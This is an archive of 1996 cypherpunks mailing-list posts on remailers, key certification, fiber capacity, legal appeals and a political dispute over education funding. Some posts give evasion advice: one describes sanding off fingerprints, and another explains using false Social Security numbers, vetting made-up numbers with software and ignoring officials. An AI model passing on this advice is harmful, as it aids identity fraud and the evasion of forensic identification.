Subject: Re: Defeating fingerprints
Message-ID: <9605151406.AA08123@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain




> > Burglars and safecrackers sand the ridges off.
> 
> This sounds like it'd work, but quite tedious.
> 

Two words - "power tools" !!! ;-)

I've sanded my finger tips down rather well with a 
belt sander and a fine grit belt on numerous occasions.

While I've speculated that I probably wouldn't leave much
of a finger print, I've never actually tried to take
prints after such an operation.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 16 May 1996 07:01:31 +0800
To: cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
In-Reply-To: <9605150233.AA20633@cti02.citenet.net>
Message-ID: <doug-9604151409.AA00354281@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



 "Jean-Francois Avon" <jf_avon@citenet.net> wrote:
>On 14 May 96 at 10:57, Doug Hughes wrote:
>
>
>> Who says they make a choice
>> to live in rural areas? 
>
>Why? were they lobotomized?
No, because they are too poor to live in your neighborhood.
Sure, they can live in the same geographic region, but it's still
rural and poor. People live where they can afford to live.
>
>> Do they also choose not to have enough money
>> to pay for shoes?
>
>You got to choose to do what is needed to live a better life.  And 
>most of them ain't doing what it takes.
>

Are you saying those poor people in rural West Virgina only live
there because they are not trying hard enough to get out?  
(I'm using rural West Virgina as an example. Many people do get
a good education and move elsewhere, but not all) Don't bother
answering. If you think this is the case, that is your opinion, but
I disagree.


>> So, because they live in a poor district they are
>> not entitled to the same level of education as a rich city suburb? 
>> The illiteracy rate in Alabama is 40%! This is just plain sick!
>
>When I was a kid, everything that had characters printed on it was 
>readable.  Who is *preventing* them from reading?

environment, lack of education, lack of money, lots of factors. Nobody
is holding a gun to anybody's head saying "Don't Read". But improving
literacy is a goal that needs to be undertaken. Do you not agree that
low literacy is a bad thing and needs to be taken care of? If not, why
not? Naturally, you can't force someone to read who doesn't want to.
But, why, given a good learning environment and an inspiring teacher
would you not want to?
>
>> But the statement that we shouldn't subsidize
>> rural customers because they CHOOSE to live there (even though some
>> are poor and can't afford to live anywhere else) is just plain
>> fallacious.
>Please, substantiate your claims with in-context arguments.
>

Some people on this list argue that the current representative govt
system is bad, and that true democracy is better. You can't have true
democracy without education. (You can, but it would be very bad).
True democracy relies on people being educated, the more the better.
(Actually, education benefits the entire society.)

>> Just because you choose to live in the city does not
>> mean people always choose to live where they live.
>Who cast their feet in concrete blocks?
>
Where is somebody making less than $5000/year going to move to?
(Answer: somewhere rural and poor).  Or, if you prefer, they can
move into tax-payer subsidized housing? (I'd prefer not, thanks)

>
>> Education is one
>> thing (perhaps the only thing) that deserves to be subsidized in
>> this country. 
>I think that it should not be subsidized.
>If you feel like subsidising education, then by all means, do it.  
>But why should you stick a gun in my back to do the same?  What if I 
>do not want to do the same as you?
>
Then you will be living in a country with lower education standards, 
increasing illiteracy, and a pretty pitiful base with a declining
socio-economic structure. Are you arguing that people are not equal
and those with more money should of necessity get better education? 
Because that's what it sounds like to me. If not, perhaps you would
care to clarify.  You can vote that poor people shouldn't be educated
at all, but that would be worse than paying for them to be more educated.


>> the tone of
>> the above message is callous, besides being wrong.
>In *my* opinion, it is right on the money.  But if you can stand 
>reality, then I understand why you rant...
>
>BTW, I do not understand the "logics" that want to bring everybody 
>down because some individuals are down.  This is a system that punish 
>achievement for being achievement and value meekness for itself.
>A total, anti-life aberration.
>

You don't understand at all. It's not about being people down, it's
about bringing them 'UP'. It's about devaluing lack of education and
striving to improve it. I'm not talking about welfare, medicare, or
any other big govt entitlements. I'm not talking about being meek.
I'm talking about learning to read and multiply 4*9.

I'm not getting into this anymore. It's totally off topic of the list,
but I felt I had to respond to your let-the-poor-be-poor-and-uneducated
posting.

We're straying far off even my point. My point was not that I agree
with subsidizing internet connections for every school in america.
I'd have to be convinced that that is a good thing. However, making
sure everybody has a good education is of paramount importance to
any society. It's going to cost some tax dollars, but, in my opinion
it would be money well spent (unlike building the rural Appalachia
country music museum - which was completely wasted money). I also
point out that there are poor people out there that can't afford to
move from rural out-lands, unless you want them to move into
govt subsidized housing. I'd gladly take the former, wouldn't you?

Not posting any more on this.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Josh Richards <jrichard@slonet.org>
Date: Thu, 16 May 1996 09:24:22 +0800
To: Be Good <qut@netcom.com>
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <199605150708.AAA26485@netcom16.netcom.com>
Message-ID: <Pine.SOL.3.93.960515090626.3150C-100000@spork.callamer.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Be Good wrote:

> 
> The remailer capacity is quite underdone, there aren't really 
> that many remailer servers out there.  Only TWO servers outside
> the US.  Only ONE server making direct posts to netnews.  And
> what, two or three nym servers?  Obviously this is severe 
> undercapacity and we need to start up MUCH more servers and
> FAST, ESPECIALLY in foriegn countries.
[..]
> 
> I'm CLUELESS about this stuff, I'd love to help, at least by
> distributing code and exact intructions to make it as easy
> as possible to encourage clueless types to start it up.
> 
> So what is the expense of setting up a full-featured server
> like hacktic?  Mr. Graves should start up a new server, and
> tcmay is rich, so he has no excuse.

Exactly.  I'd like to here some remarks from people who have ran remailers
regarding what kind of bend it has put on their bandwidth and servers.  I
just happen to Admin. several servers on the other side of a leased
line...

Josh Richards (jrichard@slonet.org) (jrichard@fix.net)
SLO Street Tech Development (Computer Services)
<URL:http://www.fix.net/jrichard>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 16 May 1996 10:12:31 +0800
To: cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
Message-ID: <adbf59cf01021004ac30@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:09 PM 5/15/96, Doug Hughes wrote:

>environment, lack of education, lack of money, lots of factors. Nobody
>is holding a gun to anybody's head saying "Don't Read". But improving
>literacy is a goal that needs to be undertaken. Do you not agree that
>low literacy is a bad thing and needs to be taken care of? If not, why
>not? Naturally, you can't force someone to read who doesn't want to.

No, I don't think "low literacy" in some subcultures is something that
"needs to be taken care of." If members of that subculture think it a bad
thing that their kids (not to mention themselves) are not readers and are
not sufficiently literate to thrive in a high-tech world, then they need to
take steps to change the basic values of their subculture.

As I mentioned, many subcultures--too numerous to name, actually--have a
strong belief in literacy, learning, and success, and are doing extremely
well in modern American society. Other subcultures do not, and are seeing
the fruits of their bad values realized. (One notable subculture currently
has 40% of its adult male population either in prison, on parole, under
indictment, or otherwise involved with the legal system in a debilitating
way. This same subculture now has close to an 85% illegitimacy rate.)

There is nothing "I" can do about such subcultures. Loads of tax dollars
have not helped. As Charles Murray points out in "Losing Ground," the loads
of tax dollars and special giveaways to some subcultures have very likely
made the situation much worse than it was 30-40 years ago when the programs
started.


>Some people on this list argue that the current representative govt
>system is bad, and that true democracy is better. You can't have true
>democracy without education. (You can, but it would be very bad).
>True democracy relies on people being educated, the more the better.
>(Actually, education benefits the entire society.)

"True democracy" is actually much worse than what we have now. The
advantage of what we are doing with strong cryptography is that it
undermines democracy.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 16 May 1996 11:27:59 +0800
To: blanc <cypherpunks@toad.com>
Subject: RE: Why does the state still stand:
Message-ID: <199605151707.KAA25775@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:01 PM 5/14/96 -0700, blanc wrote:
>3 problems which immediately come to mind:
>
>.  What if someone, hired on one occasion but fired at another, 
>  decides in anger to > "turn coat" and report everyone to the 
>  IRS (or other fine government agency)?

I expect that as corporations move to the net, they will not have the
highly centralized structure of existing corporations.  In any case
this structure is in large part imposed by the state in order to 
facilitate tax collection.  For example the existence of the 
"Human resources department" is largely the result of state 
coercion of corporations.  In web businesses ones primary 
relationship will be with ones immediate coworkers, rather than
the greater corporation.

They will consist rather of a network of relationships -- contracting
will move up, and the Keiretsu structure will move down.  I expect
the institutional structure will resemble that of the mafia -- a loose
confederation of networks rather than tight whole. Thus defection
by one party can only cause limited damage.

In my judgement the Keiretsu form of economic organization is growing 
in large part because of improved communications and lowered 
communication costs.

The Keiretsu form does not in itself facilitate tax evasion, but it
does mean that the state has to apply coercion more directly to
more people in order to collect taxes, and that its coercion has 
to be more visibly arbitrary and disruptive.

>.  What if a company does not pay as expected - other than adopting 
> Assassination Politics, what method could an employee use towards 
> getting their expected remuneration for work done?

In order to do business, one will need a good name (or good nym).

If one does not have a good name, one will be poor.  That is why
I said "every man his own credit bureau".

>.  Wouldn't everyone need to have two jobs (or source of regularly 
> accepted cash), in order to be able to pay for services where 
> suppliers do not accept virtual cash transactions? (TCM has 
> mentioned before about the need to pay for some things 
> in tiny quantities - like quarters for a phone call, etc.)

Existing forms of ecash are costly and inconvenient, hence unsuitable
for spending in tiny quantities.  I expect that
in the not very distant future every shop will offer its own cash,
and that some of these will be in the form of millicents -- suitable
for automatic lightly supervised transactions between computers.  

I expect the transaction cost advantage will eventually be on the side
of electronic money, rather than physical money.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 16 May 1996 13:28:53 +0800
To: Matt Smith <msmith@rebound.slc.unisys.com>
Subject: Re: distributed keys
In-Reply-To: <199605151447.OAA17650@rebound.slc.unisys.com>
Message-ID: <Pine.SOL.3.91.960515103442.4292C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Matt Smith wrote:

> 
> -  Having a certifying node which every other node has the public key to and
>    who has everyone else's public key.  Requests are made of this server.  
>    The trick is making this server secure and forcing the user to devote
>    resources to this endeavour.

This is the usual approach; if you use certificates, the  private 
key for the certification agency doesn't have to be (and shouldn't) be 
accessible online; thus, even if the machine serving the certificates is 
compromised, Mallet won't be able to issue false certificates. 


---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 16 May 1996 09:36:26 +0800
To: jimbell@pacifier.com
Subject: Re: Past one terabit/second on fiber
Message-ID: <9605151544.AA08243@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In the April 1996 issue of Fiber Optic Product news, there is an article on 
> a Lucent Technologies (formerly Bell Labs...no relation...sigh...) product 
> which wavelength-multiplexes quantity 8, 2.5 Gb/second signals on a single 
> fiber, for a total of 20 Gb/sec.  This is a real, purchaseable system.  On 
> the same page is a somewhat more experimental system, done by Corning and 
> Siemens, in which eight channels at 10 Gb/sec each were transmitted on a 
> single Corning fiber.
> 
> "Wow", I said.  Far faster than the 2.5 Gb/sec transmission that is 
> currently fairly standard for long-haul fiber trunks. 

The ads say they are selling it - that doesn't mean shipping it... yet
at least.  (Note that my employer is a direct competitor of Lucent 
so I have a vested interest in setting the facts straight)

> I wasn't prepared, however, for page 38, in an article titled "Research 
> Teams Achieve 1 Trillion bits a Second."  In fact, three separate groups did 
> this.  I copy the article below.

Yes - this is still very much a lab situation only though.
It will be quite a few years before we hit that in real systems.

[...]
> 
> Even if we only consider that 20 Gb/second fiber from Lucent, that is 
> equivalent to about 300,000 simultaneous voice calls.  

An OC48 signal (~2.5 Gb/sec) will handle 48 T3's or 48 * 672 voice calls.
Multiply by 8 for 20 Gb/second and you get 258048 voice calls.
Pretty close to 300k I guess.

> With a standard, 
> 36-fiber cable, that represents 18x300,000 two-way calls, or about 4.8 
> million calls.  This is probably far greater than the maximum number of 
> people on LD in the US at any given time, and that's just a single cable trunk.

I don't know that any number fiber cable is "standard" but 
36-fiber cable is not unusual.  To find the capacity of a cable, you
have to cut the number of fibers in half (as you did) because
generally each fiber is used only for a single direction of traffic.
You then have to cut it in half again because phone companies have 
everything redundant.  So, for a connection between two cities,
there are generally 2 cables in different locations (so one backhoe
doesn't get both), with on average only 1/2 the fibers in each carrying 
paying traffic.

> If we assume that the fiber cable costs $1/meter per fiber, and the cost of 
> trenching, burial, and interconnects raise this to $10/meter/fiber, and if 
> we generously assume that the average LD call goes 3000 miles (5,000,000m), 
> that call occupies 1/150,000th of a $50 million fiber for a few minutes.  If 
> we suppose that the fiber has to gross $100,000,000 per year to pay for 
> itself, and even if it's only operating at an average 10% load level(both 
> assumptions are pessimistic, that only works out to a cost of 1.3 cents per 
> minute per call.  That's why these LD phone companies are so scared:  If we 
> can transmit Internet on fiber, that fiber can accept this extra traffic at 
> very low marginal cost.

I can't vouch much for your cost numbers - other than to apply the 
factor of 2 adjustment noted above.  I would add that much of a 
phone companies cost is in billing and customer service, etc.
Not the cost of installing and maintaining the fiber and equipement.

This is how the smaller carriers buy lots of bandwidth off of the
big guys, and remove all the billing, etc. problems to themselves.
They big guys are still making money selling the bandwidth, and the
little guy makes his profit by selling for slightly less
than the big guy and somehow making his billing, customer service, etc.
cost him less.

Internet telephony should make the use of bandwidth even more
efficient - thereby cutting costs.  The big guys who own
the fibers will still make money - the pipes that carry internet
traffic are still needed.  But the little guys will get squeezed out.
(until they become ISPs ;-).  Internet traffic could theoretically
be carried over this large amount of protection fiber (mentioned above)
that is out there for a much lower marginal cost than the current 
T3 or OC3 pipes that are being used.  The only "problem" being that these
are lower priority channels, so that if a failure occurs anywhere,
the traffic on them is dropped.  Most customers are demanding 
high uptimes so much that the idea of a very lost cost, 
but much less reliable service hasn't caught on yet.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 16 May 1996 07:41:15 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: (legal) Re: CDA Dispatch #10: Last Day in Court
In-Reply-To: <9605150217.AA26984@rpcp.mit.edu>
Message-ID: <Pine.SUN.3.91.960515104943.13592C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Joseph M. Reagle Jr. wrote:


>         Ok, thank you for clarifying that. One question regarding the "de
> novo," if a lower court decides to restrict its ruling to a specific aspect
> of the case ("indecency") can the higher court broaden the scope of its
> ruling, or must its ruling be with specific regards to the scope of the
> lower court. (I don't know if the appeal can be on the basis of the scope.)

If the legal issue was presented for decision below, and forms a part of
the notice of appeal, then it is properly preented to the court of appeal,
regardless of what the court below actually did.  Any other rule would
allow a trial court to prevent issues from being reviewed.  The Supreme
Court has been known, however, to decide issues that went beyond the
strict confines of these limits. Even things that weren't argued by the 
parties....  

If the appellate decision requires more facts in order to apply the 
legal principle decided by the higher court, it has the option of 
remanding the case to the trial court for more fact-finding in light of 
the legal rules explicated by the higher court.

[...]

[I am away from Miami from May 8 to May 28.  I will have no Internet 
connection from May 22 to May 29; intermittent connections before then.]
 
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm there.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Sun, 19 May 1996 01:24:02 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Edited Edupage, 9 May 1996
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960515175638Z-6827@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Just had to say this, on two statements from Doug Hughes:

>1.	You don't understand at all. It's not about being people down, 
	it's about bringing them 'UP'.

>2.	...making sure everybody has a good education is of paramount 
	importance to any society.
......................................................................


These sentiments are noble and on the face of them sound agreeably
empathetic with Mankind.

But what would be required to bring people "up"  (in spite of
themselves) and compose them into someone's idea of a good citizen in a
great society, would be to own them and thus to have the right to turn
them and shape them into what they "ought to be", so that they may
function on the same level as "everybody else".

Alternatively they could be set free (from tyrants & such - and we all
know who they are) to attend to the project of constructing a life, to
seek after creative solutions to the problems of existence on their own
chosen level of effort & ambition.

Which is what this American society was supposed to be about, I've read.
 
(Other countries have their own well-known methods of solving this
"problem".)


    ..
Blanc
I hope I'm not the only one here who thinks so.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 16 May 1996 11:41:45 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605151758.KAA25847@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The problem that I think the Scientology postings raise is that the
remailers cannot really be used to post copyrighted material.  That is
what got the netherlands hacktic remailer shut down.  This shows, BTW,
that being outside the United States is no guarantee of immunity.  Most
Western countries support copyrights.

Maybe the operators can try to plead that they are like "common carriers"
and should not be blamed for what people post.  Still it is going to take
deep pockets at best to prevail in this dispute, and it isn't even clear
that the remailer will win.  Maybe the lawyers on the list could comment
on legal liability of a remailer used to repeatedly post copyrighted
material, whether Scientology scriptures or Microsoft Word binaries.  I
don't see how it can happen.

(This ties in, BTW, with my posting yesterday about problems with the
"anonymous company" concept.  It is not clear that any of the
technologies we have discussed will allow continuous, long-term and
reliable broadcasting of illegal material.)

Presently all the remailers operate for free, which makes it even harder
to justify taking the chance of facing an expensive lawsuit.  On the
other hand, at least if no commercial gain is involved the operator might
escape some forms of damages if he loses.  A for-pay remailer which is
posting copyrighted material could be in even more trouble, it seems to
me.  Again, legal opinions would be welcome.

This was the basis for my suggestion that remailers may have to stop
supporting posting of messages, and instead be used for private mail
between consenting individuals.  Granted, this would probably eliminate
99% of non-cover remailer traffic.  But I would argue that as long as the
core functionality is there of letting people communicate with each other
anonymously and consensually, we would still offer an important service.

After all, what is the purpose of anonymous remailers?  It isn't really
to allow harrassing and abusive messages to be sent to one's enemies.
And it isn't to defeat intellectual property laws by proving that no one
can stop this material from being posted (remailers can't succeed in
doing this, as I said above).  Rather, I view remailers as a natural
extension of encryption.

Encryption hides the contents of the messages you send from
eavesdroppers.  But they can still see who you are communicating with.
Remailers extend privacy protection beyond "what you say" to "who you say
it to".  When used with pseudonym servers and some of the extensions we
have discussed here over the years (maildrops, etc.), they can allow the
anonymous two-way communication that is needed for real privacy.

This has nothing to do with tweaking Microsoft or Scientology by posting
information they own.  If people want to do that, they need to find
another method.  Maybe they can get usenet shut down if they try hard
enough.  I don't know how that battle is going to come out.  But I don't
see the remailers as playing an important role there.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 16 May 1996 11:21:06 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: crosspost re remailers
Message-ID: <199605151759.KAA02013@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 5/14/96 -0700, Rich Graves wrote:
>Actually, there hasn't really been any discussion on cypherpunks, which I
>find a little surprising. I'd have thought that a remailer going down
>because of political/legal pressure would raise more of a ruckus. People
>seem jaded, but I'm not sure why.

I thought the statement that remailers are supposed to be ephemeral and
common was the answer.  If one is shut down, a dozen spring up in its
place.  Advertising new remailers does become an issue.  What mechanisms
are in place for new remailers to advertise themselves?

I find it interesting that this remailer is being shut down by private
action and not by government.  (Yes, they are threatening government
action, but if they couldn't do that they would find some other threat.)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 16 May 1996 11:23:13 +0800
To: "Matt Smith" <cypherpunks@toad.com
Subject: Re: distributed keys
Message-ID: <199605151800.LAA02200@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:47 AM 5/15/96 -0600, Matt Smith wrote:
>Has anyone heard of an algorithm for managing keys automatically in a 
>distributed system?  
>
>For instance, if some low level security were to be implemented in a
>a networking stack where authentication was to be implemented, you would want
>to have each node have it's own signature so that signature checking can 
>take place when one node connects to another node.  The trick is then 
>getting every node's keys distributed to every other node.
>
>...
>
(4) Have a machine responsible for generating the public-private keys for
each node.  It has its own public-private key pair.  It uses it's private
key to sign each node's public key.  Every node gets three keys: it's
public and private keys, and the public key generating machine.

When nodes make contact they exchange signed public keys and verify the
signature of their partner's key with the public key of the generating
machine.

This is a simple certificate hierarchy scheme as seen in SET, the US Post
Office CA system, and VeriSign.  Note that the generating machine does not
need to be on any network.  In fact, it could spend most of its time locked
up in a safe since it is only needed when generating new keys.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 16 May 1996 08:43:56 +0800
To: cypherpunks@toad.com
Subject: SS Follies
Message-ID: <2.2.32.19960515150703.00749624@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Although knowingly providing a fake social security number when one
>>has any expectation of gain is, I believe, a felony.
>>
>>42 USC. sec. 408.
>
>Indeed.

Except that this only applies to official uses.  Obtaining a gain from a particular SS "account".  I don't think it applies if you lie to your employer.

>Plus, should one "just make a number up," odds are good that it "won't
>compute," that is, that it will either collide with an existing number (and
>identity, and reported income) or that it will fail the checksum/allocation
>tests.

No checksums involved (scheme invented in the '30s before that sort of thing) but there are unused ranges and geographical ranges.  Freeware program like ssn.exe (available in all the usual places) will let you vet numbers.

>The IRS imposes penalties for faking SS numbers. (Not to mention the
>punishment meted out by the Sturmgruppenfuhrers of the SS!)

If you use a "wrong" SS# on a W-4 form you will (some of the time but not always) receive a computer generated note from the SS warning you that your earnings have not been deposited into the proper account and if you don't correct the error you may lose benefits.  Further action almost never occurs.  Obviously more of a problem if done on 1040 forms. 

>A simple transposition of two digits may not get you zapped, but a
>large-scale transposition or outright falsification will. If and when they
>catch up with you.

In the case of a school or cable TV company or something that wants the SS# to use for ID or credit purposes, nothing bad is likely to happen even if you are "caught".  The SS doesn't verify SS#s for the credit agencies these days so they've had to build their own databases.

If caught by private parties, all you have to do is say, "the SS# is Mark of the Beast mentioned in Revelations.  It is part of a Satan-inspired One-World-Government Plot to establish *His* rule over the earth.  I will not abide it."

They leave you alone after that.  Civilians are remarkably easy to cow if you express strong opinions.

Real dialog from September 1983 in a Midwest State:

Officious Intermeddler: "Why aren't you in school?"

12-year-old girl:  "My daddy doesn't believe in sending me to those schools.  He says they're controlled by Communists."

Almost real dialog from the Spring of 1996:

Parent: "My child has no SS# because (he/she) has lived overseas for (his/her) entire life."

College admissions bureau-rat:  "But how can (he/she) have a Passport without an SS#?"

Parent: "That's our problem, not yours unless you've joined the State Department in the last 15 minutes."

Most SS# problems occur in cases where one interacts with official persons.  Since it is rarely necessary to interact with official persons, one can easily minimize these problems.  Don't return their phone calls to your voice mail.  Don't go to their offices.  Like Rumpole of the Baily with his letters from Inland Revenue, drop their notes into the circular file.  Don't ask, don't tell. 

Very little prison time has (yet) been served for SS# fraud.  This may change if the "Immigration in the National Interest Act of 1996" passes since it increases penalties for uttering false documents in some cases.  It doesn't apply to your interactions with your cable company.

DCF 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian dodds <jyacc!aspen!bdodds@uunet.uu.net>
Date: Thu, 16 May 1996 08:12:49 +0800
To: aspen!uunet!toad.com!cypherpunks@uunet.uu.net
Subject: Re: Past one terabit/second on fiber
In-Reply-To: <199605150618.XAA28824@pacifier.com>
Message-ID: <Pine.SUN.3.91.960515110240.13298Z-100000@aspen>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, jim bell wrote:

> But with 
> fiber transmission probably less than 1/100th the cost of older coaxial 
> transmission systems, per connection, it is unclear why they're even 
> continuing to meter LD phone calls.  

especially when 1Tb fiber is in practice - our phone calls will take only 
nanoseconds! :)

anything included in that as to why they used a dfb laser for channel 16? 
or is it something obvious i'm missing? 

i notice they're still using the encyclopedia/second benchmark..

				bri..

--bdodds@jyacc.com
brian dodds, systems administration, jyacc, inc. wellesley, ma 
--617.431.7431x125
opinions expressed within are not necessarily my own or anyone elses..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 16 May 1996 11:35:03 +0800
To: James Black <black@eng.usf.edu>
Subject: Re: PRZ /PGP
In-Reply-To: <Pine.SUN.3.93.960515112732.23639D-100000@police>
Message-ID: <Pine.SOL.3.91.960515112331.4292E-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


A deadline is a wish your heart makes...

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Thu, 16 May 1996 08:23:31 +0800
To: sameer@c2.org
Subject: Re: PRZ /PGP
In-Reply-To: <199605150636.XAA08535@atropos.c2.org>
Message-ID: <Pine.SUN.3.93.960515112732.23639D-100000@police>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Tue, 14 May 1996 sameer@c2.org wrote:

> > Freeware authors are regularly criticized for delays, at least
> > on the Mac newsgroups.  And nearly everybody in software development
> > misses deadlines.  Where I've worked, us low level grunts (the guys and
> 
> 	I'm sorry, but if you're getting paid for work, then it should
> be delivered on time (or close to on time). Whether or not the work
> you getting paid to do is going to be distributed for free or not is
> beside the point.

  In my case what seems to happen often is that my boss(es) will make some
minor change (to them) that requires making many changes to the code, and
so it takes me longer than I expected, or my homework load gets very heavy
for a few days (when projects are due :) and I have less time to finish
the program.
  Just why I sometimes go over-deadline.

==========================================================================
James Black (Comp Sci/Elec Eng Senior)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
"An idea that is not dangerous is unworthy of being called an idea at all."
Oscar Wilde 
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 16 May 1996 10:32:26 +0800
To: cypherpunks@toad.com
Subject: (Fwd) New Anonymous Remailer
Message-ID: <199605151619.LAA21672@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
From:          privacy@interlink-bbs.com
Subject:       New Anonymous Remailer
Date:          Wed, 15 May 1996 06:34:02 GMT
To:            info-pascal@ARL.MIL




You may be familiar with anon.penet.fi, which give you an
anonymous account.

Our service allows YOU to choose what the return address will be!

Please write for more info.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cardinpa@cardin.com (Paul Cardin)
Date: Sat, 18 May 1996 20:33:05 +0800
To: inet-access@earth.com
Subject: Level30 Newsletter
Message-ID: <2.2.32.19960515164701.0069d9b8@cardin.com>
MIME-Version: 1.0
Content-Type: text/plain


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 
Please Note:  Every effort has been made to post 
this announcement only in those groups and lists
where there should be a natural interest in its subject
matter.  We apologize in advance if any readers 
believe it to be off-topic or otherwise inappropriate.  
It is a single post and it will not be repeated or followed
with others.  Thank you.
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 

ANNOUNCING  LEVEL30    
An Important New Internet 
Newsletter  Dealing With
Pornography and Censorship 
Issues

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
No matter what side of these issues you are on...
DO NOT IGNORE THIS NEWSLETTER!
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 

About the Cost - FREE

About the Subscription - To receive this biweekly
(or more frequently) newsletter, simply send 
an e-mail message
     To:  majordomo@databack.com 
     Subject:  (leave blank)
     Message:  subscribe level30

About the Purpose - To instruct families on how to safely
use the Internet, and to inform families, law enforcement,
the media and other interested Internet organizations about 
breaking news in the fight to keep illegal pornography and 
child pornography OFF the Internet.

About the Title - This is the Offense Level mandated by the 
United States Sentencing Commission for the trafficking of 
child pornography often found on the Internet in Usenet 
newsgroups.  (Base offense level - 17; if the material involves 
a prepubescent minor, increase by 2 levels; if the offense
involves distribution, increase by at least 5 levels; if the offense
